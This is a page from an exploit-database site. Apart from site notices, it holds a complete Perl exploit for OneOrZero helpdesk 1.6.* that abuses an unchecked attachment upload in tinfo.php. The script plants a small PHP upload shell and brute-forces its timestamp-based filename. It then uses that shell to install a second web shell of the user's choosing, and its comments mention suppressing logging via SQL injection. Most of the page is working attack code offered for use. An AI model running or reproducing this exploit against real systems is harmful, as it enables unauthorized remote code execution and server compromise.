0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

OneOrZero helpdesk 1.6.*. Remote Shell Upload Exploit

Author

Ams

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-4507

Category

web applications

Date add

19-12-2008

Platform

unsorted

=====================================================
OneOrZero helpdesk 1.6.*. Remote Shell Upload Exploit
=====================================================


#!/usr/bin/perl
=about

 OneOrZero 1.6.* Perl exploit

 AUTHOR 
	discovered & written by Ams
	ax330d 

 VULN. DESCRIPTION:
	In 'tinfo.php' script there are function
	named uploadAttachment() through which
	we are able to upload files.
	It does not checks what the file
	is uploaded.

 EXPLOIT WORK:
	First of all it uploads small shell,
	then, due to unknown shell name,
	it bruteforces it.
	(Uploaded shell name is concatenation 
	of original filename, 
	unix timestamp and substracted
	microseconds from time.)
	Then it uploads new shell through 
	small shell.
	(Script saves to DB what has been uploaded,
	but if magic_quotes_gpc=off exploit
	will disable this logging via SQl-inj.)

 REQUIREMENTS:
	Upload must be allowed.
 
 PS:
	With register_globals=on there are even more
	vulnerabilities, starting from LFI till 
	remote code execution.

=cut

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common;

$| = 1;
&banner;

my $expl_url = shift or &usage;
my $tshell2  = shift;
&usage unless -f $tshell2;

my $tshell = q(<?php move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name'])?print('ok1'):0;?>);
my $spider = LWP::UserAgent->new;

$spider->timeout(9);
$spider->max_redirect(0);
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');

exploit($expl_url);

sub exploit {
    
    $_ = shift;
    
	my($prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
    print "\n\tExploiting: $prot://$host$path\n";
	
    my $req
        = POST "$prot://$host$path/tinfo.php?id=999999",
        Content_Type => 'form-data',
        Content      => [send_mail    => 1,
						 SelectedFile => [ undef, 'by441e.php', 'Content_Type' => '\' text', 'Content' => $tshell ]
						];
	
	my $start_time = time();
	
    my $res = $spider->request($req);
    if (!$res->is_success) {
        print "\tFailure...\n" . $res->status_line . "\n";
        return 0;
    }
    
	if ($res->content !~ /by441e\.php/) {
		print "\tFailure...\n";
		return 0;
	} else {
		print "\n\tTest shell uploaded";
	}

    my $finish_time = time();
    
    print "\n\tStarting bruteforce (start:${start_time}000 finish:${start_time}999)\n";
    
    for my $sec ($start_time .. $finish_time) {
        for my $micro ('000' .. '999') {
			
            print "\t$prot://$host$path/attachments/$sec${micro}_by441e.php\r";
            $res = $spider->request(HEAD "$prot://$host$path/attachments/$sec${micro}_by441e.php");
			
            if ($res->status_line =~ /200/) {
                print "\n\tFound one of shells...";
				if (reload("$prot://$host$path/attachments/$sec${micro}_by441e.php")) {
					print "\tShell: $prot://$host$path/attachments/sha.php\n";
				}
                return;
            }
        }
    }
	
    print "\n\tCould not find shell...\n";
}

sub reload {
	
	my $addr = shift;
    my $req
        = POST $addr,
        Content_Type => 'form-data',
        Content      => [ f => [ $tshell2, 'sha.php']];
	my $res = $spider->request($req);
	
	if ($res->content =~ /ok1/) {
		print "new shell uploaded!\n";
		return 1;
	} else {
		print "could not upload new shell.\n";
		return 0;
	}
}

sub usage {
    
	print "
	Provide url and shell what to upload.
	Usage:
		perl $0 http://example.com localshell.php

";
	exit;
}

sub banner {
    
    print "
	~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	  OneOrZero 1.6.* exploit
	~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	";
}



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

OneOrZero helpdesk 1.6.*. Remote Shell Upload Exploit

Report Error

Report Error